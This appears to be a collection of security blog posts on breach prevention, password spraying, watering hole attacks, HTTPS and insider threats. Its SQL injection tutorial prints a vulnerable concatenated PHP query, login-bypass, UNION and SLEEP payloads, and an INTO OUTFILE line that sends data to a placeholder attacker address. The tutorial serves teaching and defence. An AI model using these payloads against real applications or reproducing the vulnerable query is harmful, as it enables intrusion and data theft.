Information security is a critical aspect of modern society, as we rely heavily on digital systems to store and transmit sensitive information. Ensuring that this information remains confidential and secure is essential to maintain trust and protect against cyber threats. However, achieving a proper balance between security controls and convenience is a major challenge.

On one hand, security controls are necessary to prevent unauthorized access and protect sensitive information. For example, strong passwords, two-factor authentication, and encryption are all security measures that can help keep information secure. However, as the number of security controls increases, the user experience becomes increasingly inconvenient. For example, a user might have to remember multiple passwords or enter long codes every time they want to access a system.

On the other hand, convenience is an important factor to consider because it can affect user behavior and determine whether security controls are effective. For example, if users are frustrated by the inconvenience of logging into a system, they might be more likely to write their passwords down where they can be easily accessed. Similarly, if users find it too difficult to navigate a complex security system, they may be more likely to seek out alternative, less secure solutions.

The key to effective information security is finding a balance between security controls and convenience. Too much security can lead to a decrease in convenience, which can result in users bypassing the controls and leaving sensitive information vulnerable. On the other hand, too little security can result in critical information being easily accessible to unauthorized parties.

To ensure a balance between security controls and convenience, you can take the following steps:

1. Conduct a risk assessment: Start by assessing the risks to your sensitive information, and determine what level of security is required to mitigate those risks. This will help you determine the right balance between security controls and convenience.
2. Choose the right security measures: Choose security measures that are appropriate for your risk level and provide the necessary level of protection. Ensure that the measures are both effective and convenient for users.
3. Train users: Provide users with the training and resources they need to understand and use security measures effectively. This will help them understand the importance of security controls and why they need to follow them.
4. Monitor user behavior: Regularly monitor user behavior to ensure that security measures are being used correctly. This can help you identify any areas where users are struggling with convenience and make changes as necessary.
5. Continuously review and update: Regularly review and update your security measures to ensure that they are still effective and relevant. This will help you maintain the balance between security and convenience over time.
6. Consider user feedback: Encourage users to provide feedback on the security measures in place, and use their feedback to improve the overall experience. This can help you identify areas where you can improve convenience without sacrificing security.

In conclusion, finding a balance between security controls and convenience is essential for effective information security. By striking a balance, organizations can ensure that their security measures are both effective and usable, reducing the risk of cyber attacks and protecting sensitive information. This requires careful consideration of the security measures being implemented and a clear understanding of the impact they will have on users. Only by taking a balanced approach can organizations ensure that their information security systems are effective and usable and that sensitive information remains secure.

The importance of cybersecurity has grown exponentially over the last decade. Today, data security and privacy are popular within data security regulations that impose strict penalties on companies that ignore ongoing threats from cyber attacks such as malware and intruders. It's still the hottest topic for IT professionals. But even some IT professionals aren't clear about the difference between data privacy and data security. This week's blog post explains the similarities and differences between these terms.

What Is Data Privacy?

Privacy ensures that unauthorized parties do not have access to your information and that you continue to control your personally identifiable information (PII). Therefore, Data privacy primarily deals with procedures and policies governing the collection, storage, and use of PII and proprietary company information such as trade secrets, personnel, and internal processes. PII is highly confidential because of the civil and criminal liability companies and individuals face if improper disclosure is allowed overtly or due to unintended data security breaches.

To ensure privacy, you need more than a specific technology or set of technologies. This includes training all employees who have access to sensitive data about approved data protection processes. Just as airline pilots use checklists to ensure that essential items are checked before a flight and monitored during flight, IT professionals must also be willing to use privacy policies and other resources to protect PII and other sensitive information. In particular, to ensure privacy, IT professionals must have a set of policies, and processes detailing how organizations and their employees collect, store, and use sensitive data on all systems. This privacy policy aims for all employees to recognize the importance of privacy, understand how to prevent inappropriate disclosure of information, and deal with privacy issues and policy violations.

Data breaches are no longer just embarrassing or inconvenient for businesses. Currently, privacy laws such as  GDPR impose penalties for failing to protect the privacy of PII and other sensitive personal information. These compliance standards may impose financial penalties and criminal charges for PII's intentional and, in some cases, unintentional disclosures. GDPR imposes privacy standards and legal requirements on all companies that store or process the personal information of EU residents.

What Is Data Security?

Data security uses physical and logical strategies to protect information from data breaches, cyber-attacks, and accidental or intentional data loss. Specifically, technologies and techniques used to prevent:

• Unauthorized access
• The deliberate loss of sensitive data
• Accidental loss or corruption of sensitive data

Examples of measures to ensure data security include data encryption, both at rest and in transit, and physical and logical access control to prevent unauthorized access. Specific techniques include multi-factor authentication, multiple layers of network and application-level access control, and detection and isolation of rogue devices after connecting to the network. Regular backups and a proven disaster recovery plan are essential parts of data security.

In short, data security is based on a technically sophisticated and comprehensive approach to protecting all networks, applications, devices, and data stores within an enterprise IT infrastructure.

Data Privacy vs Data Security

The best way to understand the difference between data security and privacy is to look at the mechanisms used in your data security and privacy policies. Privacy policies control how data is collected, processed, and stored. While your organization's data security is more robust, detailing physical and logical controls to secure data. The way you collect, store, or distribute that data can violate your privacy policy. For example, enterprises can ensure that sensitive information is encrypted, masked, and restricted adequately to authorized parties. However, improper collection of this data, such as not obtaining informed consent from the data owner before collecting the data, does not change the security of the data but violates data privacy rules.

Conclusion

Implementing a privacy policy system is no longer just an admirable goal, given what's at stake for organizations that are outsourced to PII for their customers and employees. This is a mission-critical aspect of an organization's information security framework and operations. Best security practices were implemented before privacy regulations were enacted. Today, data protection security systems directly impact most organizations' risk management strategies. Protecting data privacy and security should be a priority for all employees, not just IT professionals.

Preventing data breaches is a top priority for organizations of all sizes and sectors. Infringement of sensitive information, whether personal information such as credit cards or proprietary information such as intellectual property or financial forecasts, can have serious consequences. Organizations suffering from data breach incidents face compliance and additional fines, market share loss, and reputational damage.

As the amount of information grows and the threat landscape changes, deciding how to prevent data breaches seems like an insurmountable challenge. It's not. Though not an exhaustive list, here are six great tips to protect businesses from data breaches.

Develop a Sound Information Security Policy

Every organization must have a written information security policy that covers all aspects of data processing on the network. That is, what data can be collected, how data is managed,  retention of each type of data, level of security control required for each type of data, etc.

Implementing this policy requires automated data detection and classification. By identifying and classifying all sensitive information you create, process, and store by type, you can protect your information according to its value and confidentiality.

Become Compliant (Maintain it too)

You need to understand what regulations your organization is subject to and use those requirements to determine which data security controls to implement for each type of data. For example, if your company stores credit card payment data, it must be PCI DSS compliant. Therefore, you should ensure that all files and databases, including your customer's credit card number, are adequately protected and constantly monitored for suspicious activities.

Employ Data Encryption Where Applicable

Data encryption is a data security best practice that is often overlooked. Still, it is very effective because it makes stolen data useless to thieves. Encryption can be software-based or hardware-based. It is essential to encrypt the data both in storage and in transit. In particular, make sure that portable devices containing sensitive data are encrypted.

Adapt the Principles of Least Privilege

Only authorized personnel need to have access to confidential data. By strictly applying the principle of least privilege (restricting the access rights of each employee, contractor, and other users to the minimum necessary to do the job), you can minimize exposure to malicious insiders and threat actors who seek to compromise confidential data.

Audit Your Infrastructure Regularly

Regular audits help assess the effectiveness of security management and identify security risks. Experts recommend conducting audits at least twice a year, but audits can be done more frequently. Be it quarterly or monthly. Internal audit helps you prepare for compliance audits and improve security.

Vulnerability management is critical and should be a part of your audit strategy. Assign values ​​to all assets in your IT infrastructures, such as servers, computers, and databases. Then use techniques such as vulnerability scanning and penetration testing to identify vulnerabilities and threats in each asset. By assessing each risk's potential and potential impact, you can prioritize actions to mitigate the most critical vulnerabilities of your most valuable assets. Be sure to PATCH, PATCH, PATCH!.

Security Awareness Training For All

Cybersecurity is not just the responsibility of IT and security teams. Users need to be aware of best practices for identifying threats and preventing data breaches. Many data breaches result from organizational errors, such as clicking on phishing links or copying unencrypted data to a personal device. Educating users about protecting sensitive data is essential to prevent data breaches.

In particular, teach your users how to choose a strong password. Explain what "strong" really means and why strong passwords are essential. Then, whenever possible, automate the implementation of that requirement through Group Policies.

Conclusion

By following these six best practices, organizations can reduce the risk of data breaches. By prioritizing data protection and choosing the right solution, you can significantly improve cybersecurity and regulatory compliance.

A typical brute force attack targets a single account and attempts multiple passwords to gain access. Modern cybersecurity protocols can detect this suspicious activity and lock the account if there are too many failed login attempts in a short period.

Password Spraying, however, is trying to log in to multiple user accounts with many common passwords. Trying one password at a time on many different accounts bypasses the standard lockdown protocol. It allows an attacker to try more and more passwords before being detected or blocked. Unfortunately, password spraying attacks are often successful because many users do not follow password best practices. The top 200 passwords leaked in a data breach in 2019 contained obvious combinations of numbers such as "12345" and the word "password" itself.

Casting a wide net can have at least some success, but today's knowledgeable threat actors rely on a more accurate approach. They usually set their sights on users who use single sign-on authentication (SSO), hoping that they will infer credentials that will allow access to multiple systems or applications. They also often target users with cloud services and federated authentication applications. Federation authentication helps mask malicious traffic, so this approach can allow a threat actor to move laterally.

If a password spraying attack compromises an account, the victim may experience a temporary or permanent loss of sensitive information. A successful attack can mean business disruption, significant loss of revenue, and loss of reputation for an organisation.

How to Detect a Password Spraying Attack

While traditional measures may not automatically detect password spraying attacks, there are some reliable indicators to watch out for. The most obvious are numerous authentication attempts in a short period of time, especially those that fail due to incorrect passwords. Of course, a closely related indicator is the increase in account bans.

Password spraying attacks also often lead to a sudden increase in login attempts affecting SSO portals or cloud applications. Threat actors can use automated tools to perform thousands of login attempts in a short amount of time. Often, these attempts come from a single IP address or device (Though they could employ measures to switch up IPs).

How to Reduce the Risk of Becoming the Next Victim

While it is important to identify successful attacks immediately, it can be devastating to allow an attacker even to access sensitive data for a short period of time. A healthy cybersecurity strategy requires a comprehensive and proactive approach that guarantees layered protection to block as many attacks as possible. Be sure to follow the following best practices:

• Require multi-factor authentication for all users.
• Develop a secure password strategy for shared accounts.
• Establish a robust password reset policy after account lockout.
• Conduct regular user awareness training to ensure that all users understand the threat of password spraying and how to develop and maintain strong passwords.

In nature, predators hide next to bodies of water (watering holes), where prey gathers and wait for the opportunity to attack. Unfortunately, cybercriminals have found a way to emulate this predatory behaviour. They prey on unsuspecting victims browsing regularly visited websites. This is called a watering hole attack.

The concept of watering hole attacks is similar to phishing. What makes phishing different from watering hole attacks is that phishing attempts to persuade unsuspecting victims to click on malicious links or attachments. Phishing attempts could also have victims perform other actions with which they would divulge their private information.

Watering hole attacks, however, don’t need to lure victims in that way. In this type of attack, attackers have already positioned themselves in a particular space, using malware to infect a third-party service or a website that the victim already frequents. This tactic is often executed with the idea of infecting devices to gain access to sensitive computer systems and data theft, whether financial, personal, strategic or intellectual.

While Watering hole attacks are targeted, they have a broader scope than phishing attacks. They will catch more victims than those targeted. As a result, attackers will often combine watering hole attacks with spear-phishing campaigns. This way, they can send highly targeted and customized emails to the victim, prompting them to visit a website that seems harmless and familiar but is compromised.

Watering hole attacks usually target businesses and organizations through their employees, vendors and suppliers. Still, public websites that are popular in the victim’s industry can be effective as well. These include discussion boards, smaller news outlets, industry conferences, and more.

How does water holing work?

Attackers start with a victim(s). They then:

1. Find websites that the victim(s) frequents.
2. Compromise the websites.
3. Wait for the victim(s) to enter.
4. Inject malware to penetrate the network, and move laterally to other systems to achieve their objective.

Simple concept, right? Well, that is the simplified version of it. But how do cybercriminals know which websites are the right ones?

They can’t just go after the large, popular websites that are likely secure and hard to compromise. They instead find their way to the less secure and smaller websites but still relevant to their targets, such as blogs and smaller company websites. In doing this search for websites the victim frequents, attackers will leverage legitimate resources. These resources include regular search engines, social networks, and IoT search engines such as Shodan and more obscure ways of gaining intelligence.

Once the appropriate website — the watering hole — has been established, attackers will look for exploitable weaknesses and vulnerabilities on the website, seeking a way to inject malicious code into various parts, usually by embedding it in banners and ads. When users visit the site and click on an element with the malicious code, it will redirect them to another website that automatically downloads a script that scans for new and known vulnerabilities. If such vulnerabilities exist, these are also used to infect the target with malware. This way, attackers gain access to the target network and perform lateral movements to find sensitive data such as customer information, financial data and intellectual property and exfiltrate or compromise that data.

Watering hole attack example

While watering hole attacks aren’t among the most common types of cybercrime, there have been a few notable real-world examples.

One such example of this attack occurred in 2013. Attackers managed to compromise systems at Facebook, Twitter, Microsoft, and Apple as part of a wide-ranging watering hole operation using websites that attracted employees from these organizations. Among other watering holes, the attackers used two mobile application development websites. One of which was iPhoneDevSDK.com. Attackers compromised these websites to served drive-by downloads of exploits for a zero-day vulnerability in the Java browser plug-in running on both Windows and macOS systems. In addition to the four significant organizations mentioned, these watering hole attacks also affected auto manufacturers, government agencies and various other businesses.

How to prevent watering hole attacks

The prevention of watering hole attacks, just like any highly targeted attacks, can be challenging. However, a combination of security awareness and proper cybersecurity culture in the organization and keeping security controls in place can help set effective organizational defense.

Here are a few best practices for preventing watering hole attacks:

• Watering hole attacks are also known to exploit known vulnerabilities. So the first step in any network defense is to keep all your systems, software, and Operation Systems updated to the latest version with all patches offered by vendors applied.
• The Zero Trust methodology can and should be applied to mitigate against watering hole attacks. Verify all third-party traffic, whether it comes from a trusted partner or a popular website. A security solution that inspects all network traffic will allow security researchers to determine if the traffic is coming from a compromised website being used for a watering hole attack.
• Web gateways are a great way to defend organizations against drive-by downloads that match a known signature or bad reputation and can provide detection for opportunistic watering hole attacks.
• As mentioned, victims are often lured to websites compromised in a watering hole attack via spear-phishing emails. Having an email security solution providing advanced malware analysis at the time of email delivery can help protect users.
• Educate your employees on the nature of these attacks and the tell-tale signs of compromised websites used in watering hole attacks and incorporate prevention and awareness practices. This strategy will ensure your employees don’t fall victim, especially when they’re innocently reading the latest discussions on industry boards and communication channels.

Conclusion

While not common, watering hole attacks are dangerous. Though these attacks have the perfect components for making them difficult to detect, an effective combination of security awareness, education, security controls, solutions, and practices can help prevent them.

When you think of password security, what comes to mind? For me, it is what can I do to keep my password safe. However, it is more than that. A password is an untold word or phrase used to gain access to a computer system, services, or a place. One would say, and I quote, "Treat your password like your toothbrush. Don't let anyone else use it, and get a new one every six months".

Five easy steps to keep your password secure:

A Strong Password

You can start by making your password strong. A strong password usually consists of 10 or more characters and includes upper and lower case letters, numbers, and symbols. The password's complexity increases the amount of time it takes for a brute force attacker to guess your password.

Keep Clear of Personal Info.

It is much easier for one to remember their password if it is personal. What is personal information: your favourite pet, people's names, birthdates, and even a wedding anniversary, to name a few. We live in this technological age, where we use social media to socialize. It is effortlessly easy to gain access to this information, hence why it is not a recommendation.

Stay Away From Complete Words

Another way of making it hard for attackers to guess your passwords through brute force or even dictionary attacks, avoid using names or full words in your passwords. Rather than using a word, you might consider using a phrase for your password to make it a strong password. Just remember to mix it up using the principles of a strong password.

Double the Strength

To increase your password strength, you can start enabling two-factor authentication for your accounts. This way, sites can further ensure that the person trying to access your account is you.

Have I been pwned?

In case you are wondering if you have gotten hacked or if your password has been stolen. In other words, was I pwned? Troy Hunt, a security expert, has made it relatively easy for us to check if we are a victim of data breaches. He created one of the oldest, best-known sites called Have I Been Pwned.

All you have to do is go to the site, where you'll see a simple search bar, you can enter your email address (safely), and the site will check it against multiple data breach records. In return, the site will inform you if the information entered has been seen in a data breach.

What should I do if my account has been pwned?

Suppose your email address got included in a data breach. In that case, it would be the best move to change your login password for your email address and the service affected by the breach. However, if you are reusing passwords (which is a bad practice), you also want to change that password on ALL those other services.

Ideally, it would be best if you never used the same passwords across multiple websites. It can be hard to remember multiple logins, but it is safer not to repeat your passwords.

If you are having trouble implementing these recommendations, consider using a password manager. Password managers are great for creating and storing complex passwords.

Guest Author: Sherika Richards

Structured Query Language (SQL) is a language that allows for interaction with databases. Many modern web applications use databases to manage data and display dynamic content to users.

SQL injection (SQLi), is an attack on a web application by compromising its database through malicious SQL statements. As it's a common attack, let's examine what it is, how it happens, and how to defend yourself from it.

What is SQL Injection?

SQL injection is a type of attack on a web application that allows an attacker to enter malicious SQL statements into the web application. By injecting malicious SQL statements, an attacker could potentially gain access, modify, and destroy sensitive data in the database.

Jeff Forristal first discovered SQL injection in 1998. In the two decades since discovery, SQL injection attacks are prevalent even today. The severity of injection attacks in web applications are recognized widely and has consistently been the top priority of web developers when developing web applications.

SQL injection is also one of the top ten most critical web application security risks according to the Open Web Application Security Project (OWASP).

How Does the SQL Injection Vulnerability Work?

An SQLi vulnerability can give an attacker complete access to your application's database through the use of malicious SQL statements. Let's examine an example of how a vulnerable application works.

Imagine the workflow of a regular web application that involves database requests through user inputs. You accept the user input through a form, a login form, for example. You then query the application database with the fields submitted by the user to validate their identity. The structure of the SQL query to your database looks something like this:

SELECT * FROM users 
WHERE username = 'johnbrown' AND password = 'johnpassword';

To make things simple, let's assume you are storing passwords in plaintext, which is a terrible idea. When storing passwords in a database, it is recommended to use a salt and hash, but I digress. So, if you accepted the username and password from the form, you may define the query in PHP as:

// Connects to SQL database

$db_query = "SELECT * FROM users 
WHERE username = '".$user."' AND password = '".$password."';";

// Executes query

If the user enters the value "admin';--" in the username field, and "blahblahblah" in the password field, the resulting SQL query that the variable $db_query generates will be:

SELECT * FROM users WHERE username = 'admin';--' AND password = 'blahblahblah';

What does this query do? In SQL, a comment starts with double dashes (–). By adding a comment after the username, the query filters only by the username without considering the password. If there were no security measures to avoid this, you would be granted administrative access to the web application just by using this method.

Alternately, a boolean attack (which we'll discuss later) is also an option in this example to gain access. If an attacker enters "blahblahblah' or 1=1;--" in the password field, the resulting query would be as:

SELECT * from users WHERE username = 'admin' AND password = 'blahblahblah' or 1=1;--';

In this instance, though the password is wrong, an attacker would be authenticated as an administrator into the application. In another example, let's say your web page displays the results of the database query. An attacker can use different SQL commands to display the tables and their contents in the database, or selectively drop tables if they so wish.

Types of SQL Injection Attacks

Now that you are aware of the basics of a SQL injection attack let's explore some of the different SQL injection types.

In-Band SQL Injection

In-Band SQL injection is the most simplistic form of SQL injection. In this process, the attacker can use the same channel to insert the malicious SQL code into the application and gather the results. Two types of in-band SQL injections are:

Error-Based Injection Attack

An attacker uses the error-based SQL injection technique during the initial phases of their attack. The concept behind an error based SQL injection is to get additional information about the database structure that the web application follows. For example, an error message may contain the table name included in the table's query and column names. An attacker could leverage that data in further attacks.

Union-Based Injection Attack

An attacker using the SQL UNION statement can display the results from a different table. For example:

SELECT link, title FROM posts
WHERE id < 10 UNION SELECT username, password FROM users;--;

Inferential SQL Injection Attacks (Blind SQL Injection)

Even if an attacker generates an error in the SQL query, the query's response might not be displayed directly to the web page. In such a case, the attacker needs to penetrate further.

In this SQL injection method, the attacker sends numerous queries to the database to assess how it interprets them. An inferential SQL injection is sometimes referred to as blind SQL injection. Two types of Inferential SQL Injections are:

Boolean Injection Attack

Suppose an SQL query results in an error that was not handled properly. In such a case, the resulting web page may display an error, load partially, or load a blank page.

In a boolean SQL injection, the attacker assesses which parts of a user's input are vulnerable by trying two different variants of a boolean clause:

• "… OR 1=1"
• "… AND 1=2"

Suppose the application works as it should in the first case but shows an anomaly in the second case. In that case, it indicates that the application is vulnerable to boolean-based SQL injection attacks.

Time-Based Injection Attack

A time-based SQL injection attack can also help an attacker assess if a web application is vulnerable to SQL injection. With this method, an attacker uses a pre-defined time-based function of the application's database management system. For example, in MySQL, the SLEEP() function tells the database to wait for a certain number of seconds.

SELECT * FROM user_comments WHERE post_id=1-SLEEP(15);

If the results of such query delays, the attacker would know that the application is vulnerable to time-based SQL injection attacks.

Out-of-Band SQL Injection

Suppose an attacker is unable to gather the results of a SQL injection through the same channel. Out-of-band SQL injection techniques are alternatives to inferential or blind SQL injection attack techniques.

Usually, these techniques involve sending data from the target application database to an attacker's remote location. This process, however, is highly dependent on the capabilities of the target database management system.

An out-of-band SQL injection attack makes use of an external file process capability with your database management system. In MySQL for example, the LOAD_FILE() and INTO OUTFILE functions can instruct MySQL to transmit the data to an external source. Below is an example of how an attacker might use OUTFILE to send the results of a query to an external source:

SELECT* FROM users 
INTO OUTFILE '\\\\MALICIOUS_IP_ADDRESS\location'

Similarly, LOAD_FILE() may be used to read a file from the server and display its contents. Suppose an attacker combines the LOAD_FILE() and OUTFILE functions. In that case, it is possible to read the contents of a file on the target server and then forward it to a remote location.

How to Prevent SQL Injections

As we now know, an attacker can use an SQL injection vulnerability to access, read, modify, or even destroy your database's contents.

Additionally, such a vulnerability could enable an attacker to read a file on any location within the target server and transfer the contents elsewhere. Let's now explore various techniques to protect your web application and website against SQL injection attacks.

Never Trust Input

The most important aspect of preventing SQL injections can be summed up in a single sentence: Always assume all input to be malicious. By all input, I mean any information from outside your application that the application itself did not generate.

So, don't trust data from third-party systems or plugins your application imports. Also, any data provided by the user, such as form fields, URL parameters, or user-provided files, should always be automatically distrusted. Data from APIs your app consumes also go on that list. These examples are far from exhaustive, but the same rule applies. Always consider input as malicious by default. Verify it first, and only when you deem it safe should you proceed.

Use Prepared Statements

A prepared statement is a template of an SQL query, where you specify parameters at a later stage to execute it. Here is an example of a prepared statement in PHP and MySQL.

$query = $mysql_connection->prepare("SELECT * FROM users WHERE username = ? AND password = ?");

$query->execute(array($username, $password));

Execute with the Least Privilege Possible

This tip is different from the previous ones. Here, we'll leave the realm of programming languages for a bit and instead, venture into the database.

This tip is less about avoiding SQL injections and more about mitigating their effects, should they happen.

The idea itself is straightforward: In areas where you're just reading data, don't use connection strings in which the user has writing privileges. That way, even if an attacker manages to inject a malicious query, they won't be able to insert, change, or delete any data.

There are many more ways to prevent SQL injection attacks that this article did not go into (using Web Application Firewalls, and store procedures) but fret not. More information on how to prevent SQL injection attacks is simply a Google search away.

Resources

1. SQL injection lab - Login Bypass
2. SQL Map is an open-source tool that automates the process of detecting and exploiting SQL injection vulnerabilities
3. Atlas is an open-source tool that can suggest SQLMAP tampers to bypass WAF/IDS/IPS.
4. This repository has some cool resources on SQL Injection. It includes some cheat sheets and many useful payloads that can be used depending on the use case.

Lomar Lilly, a senior information security consultant working in Jamaica for Symptai Consulting Limited, holds multiple CompTIA cybersecurity certifications, including CompTIA Security+,CompTIA Cybersecurity Analyst (CySA+), CompTIA PenTest+ and CompTIA Advanced Security Practitioner (CASP). CompTIA spoke with him about his professional experience, and he offered direction to those interested in entering the cybersecurity field.

How does your job in IT compare to other 9-to-5 jobs?

I have worked many 9-to-5 jobs outside of IT, and I can say with confidence that those jobs are incomparable to what I’m now doing. Watching the clock, waiting for lunch and looking forward to the end of the workday basically sums up how I remember spending my time in previous jobs.

Now, being in a cybersecurity role in an engaging environment, my work life is very different. I can’t count the number of times I’ve said to myself at the end of the workday, “What? It’s 5 o’clock already?”

Read the Full Article at CompTIA.org

Security Through Obscurity (STO) is a controversial topic within the infosec community. It is commonly based on the premise that the secrecy of specific details or functions of a system can ensure Security. As such, many cybersecurity professionals frown on the idea of implementing Security through obscurity because it is a "Bad" practice. Basing their conclusion on the premise previously mentioned, they aren't wrong; however, that's just half the picture. Let's explore this concept in its entirety to expose the good, the bad, and the ugly.

What Exactly is Security Through Obscurity (STO)?

Simply put, Security Through Obscurity is based primarily on hiding vital information and enforcing secrecy as the primary security technique. Generally, when implementing STO, it is assumed that, as long as attackers lack information about the system's internal design, they will not get at its vulnerabilities. While the assumption is not entirely inaccurate, there are a few things you should take into consideration.

Security Through Obscurity: The Good

Used along with other security mechanisms, such as TCP Wrappers, proper firewalling, IP-based restrictions, 2FA, Security Through Obscurity can be a very efficient way to reduce the chances of an attack. How? Well, for starters, it slows one of the most critical phases of the hacking methodology - Reconnaissance.

Reconnaissance or recon for short is a phase of the hacking methodology where the attacker sets out to learn as much information about the target system in an attempt to launch an effective attack.

Having implemented STO would have slowed this process down, potentially deterring non APTs from following through with an attack. Information such as banner information, default configuration settings, and default system reactions are hidden or altered when using STO to throw attackers off.

For example, removing banner information, such as the webserver version number (e.g., nginx 1.6.1) or the version number and name of the software running on the webserver (e.g., WordPress 5.6). Another example would be to change default ports for services such as SSH for example. SSH is known to run on port 22, but what if you change that operation port to 65822? Again, bear in mind that these tactics might only slow the recon and the exploitation phase, so beware of the bad and the ugly.

Coupled with your intrusion detection and prevention system (IDS), Using STO techniques could allow for early detections of ongoing attacks. How? Suppose an attacker seeks to forgo the recon phase because of the lack of information available and decides to execute a Hail Mary Attack, well. In that case, the attacker loses his stealth, and you'll know an attack is ongoing.

Security Through Obscurity: The Bad

STO is only useful when used as an additional layer of defensive. Solely relying on STO to protect your assets is a bad idea. STO will not be effective against blind attacks or APTs.

Let me repeat it for the people in the back. Solely relying on Security through Obscurity as a Security mechanism is a BAD idea.

Security Through Obscurity: The Ugly

Some professionals would argue that using STO as your only layer of defense puts you at HIGH risk because essentially, you have zero protection, and in today's climate, that's not bad; that's ugly.

Conclusion

When cybersecurity professionals talk about STO, the real concern is that  Security is implemented solely through obscurity - a state where the only protection mechanism involved is hiding critical details or function of an asset.

STO can slow reconnaissance activity, and force the attacker to initiate actions that can no longer be as stealthy, resulting in increased exposure. Obscurity measures can complement Security, and as long as it is not employed in complete isolation, it can be considered another powerful tool to provide defense in depth.

As a cybersecurity tip, you will always hear "ensure that the website you are browsing or entering confidential information such as usernames, passwords, or credit card information uses HTTPS." While this tip is vital to bear in mind when browsing the web, many misunderstand it, and this article seeks to set the record straight.

Simply put, HTTPS means that the website was issued a certificate from a certificate authority (CA), and a pair of cryptographic keys were generated for it. These keys allow the website to encrypt information transmitted between you and the website itself, making it perfect for protecting sensitive data such as your passwords and credit card information in transit from prying eyes. However, many mistake HTTPS to mean that the website is safe from all types of web-based attacks, which is not the case.

It should be made clear that issued certificates say nothing about the site itself as a phishing page or any other malicious site can just as easily get a certificate and encrypt all traffic that flows between you and it.  According to an article written by Phishlabs in 2017, a quarter of all phishing attacks are carried out on HTTPS sites. Moreover, more than 80% of users believe that the mere presence of a little green lock and the word "Secure" next to the URL means the site is safe, and they don't think too hard before entering their data.

Still not clear? Let's explore this scenario. You clicked on a phishing link that took you to a fake version of your bank's website, for example. That phony website may use HTTPS, which securely transports your information to the criminals to collect it. Sure, HTTPS ensures is that no one else can spy on the data you enter. But your information can still be stolen by the website itself if it's fake.

In conclusion, your biggest take away from this article should be that the presence of a certificate and the green lock means only that the data transmitted between you and the website is encrypted and that a trusted certificate authority issued the certificate. But it doesn't prevent an HTTPS site from being malicious; a fact, phishing scammers most skillfully manipulate. So always be alert, no matter how safe the website may seem at first glance.  Never enter confidential information such as passwords, banking credentials, or any other personal information on websites if you are unsure of its authenticity. To check the authenticity of a website, you can always check the domain name very carefully as the name of a fake webpage might differ by only one character.

An insider threat is a security risk that originates within the targeted organization. The actor do not have to be current employees or officers within the organization, but could also be a consultant, former employee, business partner, or board member. With insider threats representing the primary vector for 60% of data breaches, organizations need to examine the threats walking through their door every day with as much thoroughness as they show when securing the perimeter from external threats. According to the Ponemon Institute, the average cost of insider caused incidents was $8.76 million in 2017, which was more than twice the $3.86 million global average cost of all breaches during the same year. According to Verizon, there are five main classifications for insider threats. These are:

1. The careless worker. These are employees who engage in inappropriate behaviour, much of which fall into the category of "Shadow IT." Shadow IT describes users who procure or use a cloud application, such as a file-sharing app to increase productivity, but inadvertently expose the company. These behaviours can include misappropriating resources, breaking acceptable use and security policies, using unapproved workarounds, and installing unauthorized applications. And while these behaviours tend not to be malicious, they can open up new vulnerabilities within an organization. In combating these types of insider threats, organizations can impose consequences such as fines, demotions, or job termination whenever employees conduct themselves within these behaviours.
2. The inside agent. These are individuals who cooperate with a third party, frequently competitors or nation-states, to use their access in a way that intentionally causes harm to the organization. Bad actors will recruit or bribe susceptible insiders to steal information on their behalf. Having proper data loss prevention mechanisms is a good defense in combating this type of malicious insider. Insider-caused incidents, including collusion, are among the costliest categories of a breach and may take four times longer to detect than incidents caused by individual insiders.
3. The Disgruntled Employee. These are insiders who try to harm their organization by destroying data or disrupting business activity. This form of insider threat stems from employees who often feel that they have been wronged by the organization and attempt to lash out as an act of revenge. To combat this form of insider threat, having employees sign non-disclosure agreements that explicitly outline the consequences of sharing company secrets to outside parties. This will be somewhat of a deterrent for persons seeking to enact their revenge through data exposure.
4. The Malicious Insider. – These are employees are aware of their actions and the negative implications on the organization, yet still, pursue those actions. Malicious insiders are especially dangerous when they have elevated levels of privilege, such as system administrators or database administrators, with a classic example of such being Edward Snowden, who used his access to classified systems to leak information relating to cyber espionage at the NSA. Combating this type of insider threat can be tricky. Still, one recommendation I think could work is to limit a single employee's access to sensitive information as much as possible throughout the organization. No one person should be able to access, view, or modify confidential information without needing a second or third individual for authorization. I believe this method could be useful as a malicious insider would need to justify there reasoning for accessing certain information.
5. The Pawn. A pawn is just a regular employee who makes a mistake that a bad actor exploited or otherwise led to data loss or compromise. Whether it's an unwitting employee downloading malware to their workstation or a user disclosing credentials to a third party pretending to be a help desk employee, this vector is one of the broader targets for attackers seeking to cause harm to the organization. The best way to combat this form of insider threat is through ongoing employee security awareness training. A company that partners with employees to ensure security awareness will do better than forces compliance or performs training to check a box.

Cybersecurity affects every employee, from the executive team to marketing, sales, HR, etc. For this reason, cybersecurity should be everyone's responsibility. Cyrix found that 40% of employees believe that they assume no responsibility for securing information. This thought is why many organizations place the responsibility of cybersecurity on their IT departments' shoulders, but adequate security must be a companywide endeavor. Though it does make sense as they are the tech experts who would most understand how to keep a business secure. Still, employees are at risk every time they log onto their computers, and as such, an organization should not rely solely on one team for security. Here are three reasons why I believe cybersecurity is everyone's responsibility.

1. Employees are Potential Targets. Employees within an organization engage in activities that put them at risk daily, whether they realize it or not. Coming across a questionable link while browsing or receiving a spam email can happen to anyone. Employees cannot avoid or help address what they do not understand and recognize. According to ThinkCSC, whether the potential risks are phishing emails, ransomware, out-of-date software, unapproved applications, or malware, employees must be taught to recognize and report suspicious activity. Sophisticated cyberattacks will also target employees in critical positions or represent particularly vulnerable areas of the organization, including the CEOs, CFOs, CIOs, etc. As such, everyone within the organization should be aware and exercise cybersecurity.

2. Strengthens Defense in Depth. Defense in Depth is an approach to cybersecurity in which a series of defensive mechanisms are layered to protect valuable data and information. If one layer fails, another should step up immediately to thwart an attack. While technology plays a vital role on multiple levels, another essential layer of prevention is creating a security awareness culture across the organization. According to Heimerl, establishing a culture of security awareness within an organization is both a mindset as it is a mode of operation. Everyone within an organization needs to adopt this new mindset to help reduce vulnerabilities as part of a collective effort and enforce Defense in Depth.

3. A cyber breach could affect everyone within an organization. A data breach's financial impact is undoubtedly one of the most immediate and hard-hitting consequences that organizations will have to deal with. Costs can include compensating affected customers, investigating the breach, setting up incident response efforts, legal fees, and investment into new security measures, not to mention the eye-watering regulatory penalties imposed for non-compliance with the GDPR which could drive businesses to bankruptcy. According to The National Cybersecurity Alliance, 1,008 small businesses with up to 500 employees, found that after experiencing a data breach 10% went out of business, 25% had to file for bankruptcy, and 37% experienced a financial loss. Livelihoods could indeed be lost because of a breach, so everyone should protect their Livelihoods.

Cybercrime is more organized and sophisticated than ever before, and as such, every person in every company, in every organization, is a security champion.

